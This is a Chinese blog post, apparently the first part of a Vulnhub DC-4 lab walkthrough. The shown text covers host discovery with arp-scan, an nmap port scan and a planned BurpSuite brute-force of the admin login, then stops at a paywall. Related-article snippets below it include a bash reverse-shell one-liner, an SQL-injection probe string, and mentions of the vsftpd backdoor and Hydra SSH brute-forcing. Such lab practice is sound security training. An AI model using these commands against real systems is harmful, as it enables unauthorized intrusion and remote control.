Vulnhub DC-4靶机攻击实战(一)

最新推荐文章于 2025-03-13 14:35:34 发布
最新推荐文章于 2025-03-13 14:35:34 发布
阅读量1k 收藏 12
点赞数 26
CC 4.0 BY-SA版权
文章标签: java javascript android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/nihui123/article/details/144367443

导语
  在之前的分享中,我们介绍了关于DC-3靶机的攻击,在DC-3靶机的攻击过程中,主要介绍了SQL注入以及WebShell相关的知识点,并且最终拿到了Flag。接下来我们介绍DC-4靶机攻击,与DC-3靶机类似,DC-4也是技术验证没有那么多的Flag我们只需要获取最终Flag即可。

第一步、下载并安装DC-4

  可以去Vulnhub官网下载DC-4虚拟机环境并将其导入到VMware虚拟机中,如下所示。
在这里插入图片描述

第二步、信息获取

  虚拟机环境搭建完成之后,接下来需要做的事情,就是对虚拟机信息进行采集。如下所示,可以通过arp-scan -l
命令进行扫描

arp-scan -l

  扫描结果如下所示。
在这里插入图片描述
  发现192.168.1.151地址就是我们DC-4的虚拟机地址。接下来我们就对该地址的端口开放情况进行扫描,如下所示。

nmap -sV -p- 192.168.1.151

  扫描结果如下所示,发现开放的端口是80和22端口。
在这里插入图片描述
  接下来我们尝试访问该机器的80端口,如下所示,一个非常简单的登录页面
在这里插入图片描述
  根据页面提示,我们可以尝试通过admin用户进行登录,这里就用到了我们之前进行爆破的一个工具BurpSuite,如下所示,拦截登录请求尝试将登录请求进行拦截用来爆破admin的用户名的密码。

最低0.47元/天 解锁文章

200万优质内容无限畅学
靶机实战-blogger
ST0new的博客
04-05 4115
位Web 开发人员 James M Brunner 最近创建了个博客网站。他雇佣你来测试他博客网站的安全性。
Vulnhub DC-8靶机攻击实战()
初学者
01-16 1291
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新期关于Vulnhub DC-8的打靶训练,如下所示。
网络安全分组混战靶机攻击与加固——BPlinux系列
旺仔Sec&blog
05-21 1405
具体来说,攻击者可以在FTP命令中嵌入恶意的smiley face字符(即“:)”),如果该命令被vsftpd服务器解析并执行,则会导致缓冲区溢出,进而可能执行任意代码。攻击者还可以通过修改FTP命令中的参数,来获取当前用户的密码、文件列表等敏感信息。#注:比赛中这个靶机不会开放vnc链接也不会把密码告诉你,让你自己渗透进去然后加固,然后我们就可以使用笑脸漏洞getshell然后重置root密码为123456,注意!再新建个用户,使用新用户ssh进去然后切换回root用户就可以了,然后进行加固。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战)Tr0ll
hyjcking的博客
11-20 2528
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1479
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4941
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub DC-2靶机攻击实战()
初学者
12-06 840
篇幅有限,后续的三个flag在后续的分享中展示。
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2419
vulnhub DC-4靶机实战
Vulnhub DC-9靶机实战
kiritio1024513的博客
01-13 1280
比较接近实战靶机渗透,收获比较大,最后还给了个比较好的工具
靶机实战-DC-6
滕财然的博客
03-03 951
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的款插件...
靶机实战系列之Tomato靶机(1)次违反常规的鸿蒙大厂面试经历
2401_84181885的博客
04-14 477
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。滑至文末,获取“searchall”下载链接!尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。并没有句话木马,脚本已经被加载。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 7079
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶场】DC-4
good good study day day up
10-26 726
DC-4渗透测试过程,弱口令爆破,hydra密码爆破,teeheem命令提权
Vulnhub Thales:1靶机攻击实战()
最新发布
初学者
03-13 715
这个靶机总体来讲就是利用了Tomcat的弱密码登录,然后上传后门War包通过war包进行WebShell的连接完成之后,进行的漏洞提权操作。需要注意的就是能够敏锐的识别到Tomcat的弱密码登录以及漏洞ShellWar包的生成。
靶机实战(4):Funbox: Rookie
OneMoreThink
01-01 1123
靶机官方:Funbox: Rookie[1]实战思路:、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞 422端口/SSH服务 9组件漏洞 9口令漏洞 10口令泄露 1080端口/HTTP服务 11组件漏洞 11URL漏洞(目录、文件) 12四、越权提权 15sudo 15suid 15信息收集 18sudo、主机发现本次攻击指定IP,不涉...
DC-4靶机渗透
weixin_45349299的博客
12-21 1209
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2176
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐查看,发现在jens家目录和mark家目录下有文件信息,逐查看。mark家目录下有个文件夹,文件夹当中为个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
Vulnhub napping-1.0.1靶机攻击实战()
初学者
02-08 913
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究下。
靶机DC-3—WP
m0_66638011的博客
05-17 2531
DC系列靶机系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
VulnHub靶机实战教程:全面解析与 Walkthrough
4. **DC系列** - DC靶机VulnHub上非常受欢迎的系列,通常包含多层面的挑战,涵盖网络侦查、端口扫描、漏洞分析、密码破解等多个方面。 5. **EVM:1** 和 **GoldenEye:1** - 这些靶机可能涉及到更复杂的安全概念...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nihui123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值